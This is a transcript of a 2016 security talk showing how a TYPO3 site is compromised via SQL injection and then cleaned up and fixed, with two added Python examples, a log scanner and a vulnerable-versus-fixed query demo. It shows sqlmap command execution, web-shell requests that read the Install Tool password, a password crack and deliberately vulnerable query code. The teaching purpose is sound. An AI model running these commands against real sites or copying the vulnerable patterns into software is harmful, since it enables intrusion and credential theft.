
Diary of a Hack

Telling the story of how websites are hacked, starting on day one with creating and deploying a feature that contains a vulnerability and ending with cleaning up the website after attackers have taken it over.

Helmut Hummel

April 22, 2016

Transcript

  1. Diary of a Hack - Vulnerabilities and Exploits. Helmut Hummel <[email protected]>, 22.04.2016

  2. @helhum

  3. Security

  4. http://typotic.com/uploads/posts/3427/funny-dude-this-is-boring-01.jpg

  5. http://www.pxleyes.com/images/contests/teddy-bears-2/fullsize/Story-time-507bf54d589a1_hires.jpg

  6. http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif

  7. http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif

  8. http://i.telegraph.co.uk/multimedia/archive/02210/squirrel_2210134b.jpg

  9. https://xkcd.com/327/

  10. http://www.kitploit.com/2013/06/john-ripper-v180-fast-password-cracker.html

  11. https://ilifejourney.files.wordpress.com/2011/11/spaghetti-mess.jpg

  12. http://img3.wikia.nocookie.net/__cb20121122132016/villains/images/f/fb/Janitor_2.jpg

  13. http://i.livescience.com/images/i/000/029/390/i02/shutterstock_105432542.jpg?1343404330

  14. (no text on slide)

  15. Diary of a Hack

  16. Diary of a Hack: Day 1 - Implementing a feature

  17. Diary of a Hack

      lib.sqliSimple = CONTENT
      lib.sqliSimple {
        table = tt_content
        select.where.wrap = colPos=|
        select.where.data = GP:colPos
      }

  18. Diary of a Hack

      lib.sqliSearch = CONTENT
      lib.sqliSearch {
        table = tt_content
        select.where.wrap = header like '%|%'
        select.where.data = GP:search
      }
  19. Diary of a Hack: Day 2 - Testing the feature

  20. Diary of a Hack

  21. Diary of a Hack

      'BE/debug' => '1'
      'FE/debug' => '1'
      'SYS/devIPmask' => '*'
      'SYS/displayErrors' => '1'
      'SYS/sqlDebug' => '1'
      'SYS/exceptionalErrors' => '28674'

  22. Diary of a Hack

  23. Diary of a Hack

      'DB/username' => 'root'

  24. Diary of a Hack

  25. Diary of a Hack: Day 3 - Distraction

  26. Diary of a Hack

  27. Diary of a Hack: Day 4 - Attraction

  28. Diary of a Hack

      https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22

  29. Diary of a Hack: Day 5 - Exploitation

  30. Excursion - SQLi

  31. Excursion - SQLi

      SELECT * FROM tt_content WHERE colPos = 0

  32. Excursion - SQLi

      'SELECT * FROM tt_content WHERE colPos = ' . $_GET['colPos']

  33. Excursion - SQLi

  34. Excursion - SQLi

      'SELECT * FROM tt_content WHERE colPos = ' . $_GET['colPos']

  35. Excursion - SQLi

      'SELECT * FROM tt_content WHERE colPos = 0 or hidden = 1'
      (the part after "colPos = " is what arrived in $_GET['colPos'])

  36. Disclaimer

  37. Don't do this at home!

  38. (unless you have written permission)

  39. Diary of a Hack

      $ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos'
      GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N]
      sqlmap identified the following injection points with a total of 30 HTTP(s) requests:

  40. The power of MySQL

  41. Diary of a Hack

      $ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos' \
          --os-cmd='ls -al'

  42. Diary of a Hack

  43. Diary of a Hack

      http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL
      http://security.dev/typo3/sysext/install/Start/Install.php
      http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php

  44. Diary of a Hack

      $ john pw
      Loaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])
      password         (dummy)
      guesses: 1  time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015)  c/s: 900  trying: 123456 - fishing
  45. Diary of a Hack

  46. Diary of a Hack: Day 5 - Discovery

  47. Diary of a Hack: Discovery
      • Take site offline!
      • seriously
      • I mean it

  48. (no text on slide)

  49. Diary of a Hack: Day 6 - Analysis

  50. Diary of a Hack: Analysis
      • Make a backup of the current state (files, DB, logs)
      • Search all logs for "suspicious" entries
      • Find the point of entry (security issue)
      • If in doubt: get help
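Added example for the "search all logs for suspicious entries" step; it is not from the talk. A small Python scanner runs over constructed Apache access-log lines and flags the request shapes this deck describes: non-numeric colPos values, cmd= calls to a PHP file, and Install Tool activation. The IPs, timestamps and sizes are made up; the file name tmpbrsru.php and the paths are the ones shown on the slides.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines (sample data, not the talk's real logs). They replay
# the sequence the talk walks through: probing colPos, then using the dropped PHP file to
# enable the Install Tool.
ACCESS_LOG = """\
203.0.113.5 - - [04/Jun/2015:10:51:02 +0200] "GET /index.php?id=37&colPos=0 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Jun/2015:10:51:09 +0200] "GET /index.php?id=37&colPos=0%20or%20hidden%3D1 HTTP/1.1" 200 7310 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Jun/2015:10:53:41 +0200] "GET /tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Jun/2015:10:54:02 +0200] "GET /typo3/sysext/install/Start/Install.php HTTP/1.1" 200 8891 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Jun/2015:10:55:10 +0200] "GET /index.php?id=37&colPos=1 HTTP/1.1" 200 4990 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def suspicious(target):
    """Reasons a request target looks like part of the attack chain; empty list if none."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes the values
    reasons = []
    # The feature only ever expects a column number here; anything else is injection-shaped.
    for value in params.get("colPos", []):
        if not value.isdigit():
            reasons.append("non-numeric colPos %r" % value)
    # A PHP file that takes a cmd= parameter is an uploaded shell, not part of TYPO3.
    if parts.path.endswith(".php") and "cmd" in params:
        reasons.append("cmd= request to %s" % parts.path)
    # typo3conf/ENABLE_INSTALL_TOOL should never be created via the web server, and
    # Install Tool hits from outside deserve a look as well.
    values = [v for vs in params.values() for v in vs]
    if any("ENABLE_INSTALL_TOOL" in v for v in values) or parts.path.endswith("/Install.php"):
        reasons.append("install tool activity")
    return reasons


def scan(log_text):
    """Return (ip, target, reasons) for every log line that trips a check."""
    hits = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if match:
            reasons = suspicious(match.group("target"))
            if reasons:
                hits.append((match.group("ip"), match.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan(ACCESS_LOG):
        print(ip, target, "; ".join(reasons))
```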
  51. Diary of a Hack: Day 7 - Fix

  52. Diary of a Hack

      lib.sqliSimple = CONTENT
      lib.sqliSimple {
        table = tt_content
        select.where = colPos=###colPos###
        select.markers {
          colPos.data = GP:colPos
        }
      }

  53. Diary of a Hack

      lib.sqliSearch = CONTENT
      lib.sqliSearch {
        table = tt_content
        select.where = header like ###search###
        select.markers {
          search.data = GP:search
          search.wrap = %|%
        }
      }
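Added example, not code from the talk: a Python/sqlite3 stand-in for the TypoScript on slides 17, 18, 52 and 53 and for the concatenation shown in the SQLi excursion. The same request value is pasted into the WHERE clause in the vulnerable form and passed as a value in the fixed form. The tt_content rows are constructed; TYPO3's markers quote and escape the value, and a bound parameter stands in for that mechanism here.

```python
import sqlite3

# Constructed stand-in for TYPO3's tt_content table (sample rows, not data from the talk).
# Row 2 is a hidden element in another column: a request for colPos=0 must never return it.
ROWS = [
    (1, 0, 0, "Welcome"),
    (2, 1, 1, "Unpublished draft"),
    (3, 1, 0, "Sidebar teaser"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tt_content (uid INTEGER, colPos INTEGER, hidden INTEGER, header TEXT)")
    con.executemany("INSERT INTO tt_content VALUES (?, ?, ?, ?)", ROWS)
    return con


def vulnerable_colpos(con, col_pos):
    # Slide 17: select.where.wrap = colPos=| plus select.where.data = GP:colPos.
    # stdWrap pastes the request value straight into the WHERE clause.
    sql = "SELECT uid FROM tt_content WHERE colPos = " + col_pos
    return [uid for (uid,) in con.execute(sql)]


def fixed_colpos(con, col_pos):
    # Slide 52: ###colPos### marker. TYPO3 quotes and escapes marker values; a bound
    # parameter gives the same separation of data from SQL in this stand-in.
    sql = "SELECT uid FROM tt_content WHERE colPos = ?"
    return [uid for (uid,) in con.execute(sql, (col_pos,))]


def vulnerable_search(con, term):
    # Slide 18: select.where.wrap = header like '%|%' plus select.where.data = GP:search.
    sql = "SELECT uid FROM tt_content WHERE header like '%" + term + "%'"
    return [uid for (uid,) in con.execute(sql)]


def fixed_search(con, term):
    # Slide 53: the wildcards move into search.wrap = %|% on the marker, so they are added
    # to the value and the whole thing travels as data, not as SQL text.
    sql = "SELECT uid FROM tt_content WHERE header like ?"
    return [uid for (uid,) in con.execute(sql, ("%" + term + "%",))]


if __name__ == "__main__":
    con = make_db()
    print(vulnerable_colpos(con, "0"))                # [1]
    print(vulnerable_colpos(con, "0 or hidden = 1"))  # [1, 2]: the injected condition wins
    print(fixed_colpos(con, "0 or hidden = 1"))       # []: treated as a value, matches nothing
```

The fixed variants also survive quotes in the input: the search term is compared, not parsed.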
  54. Diary of a Hack: Fix
      • Close the security issue in Code / Extension / Core
      • Restore from backup
      • Or, if you really know what you are doing: clean up the installation
      • Go online again
      • Plan improvements (education, monitoring, …)
  55. Diary of a Hack: Day 8 - Improve

  56. Lessons learned
      • Development / Testing Environment
      • Deploy to Production
      • Least privilege
      • There is no software without bugs. Be prepared!

  57. Best Practice
      • Operations
      • Regular updates
      • Backups
      • Monitoring
      • Development
      • Peer Reviews (TypoScript, Code, Templates)
      • (automated) Tests
      • Focus
      • Education
      • Allocate time for all of the above

  58. Questions?

  59. Diary of a Hack: Resources
      • http://docs.typo3.org/typo3cms/SecurityGuide/
      • http://sqlmap.org
      • http://www.openwall.com/john/
      • https://www.owasp.org/

  60. Thank you!

  61. @helhum http://helhum.io [email protected]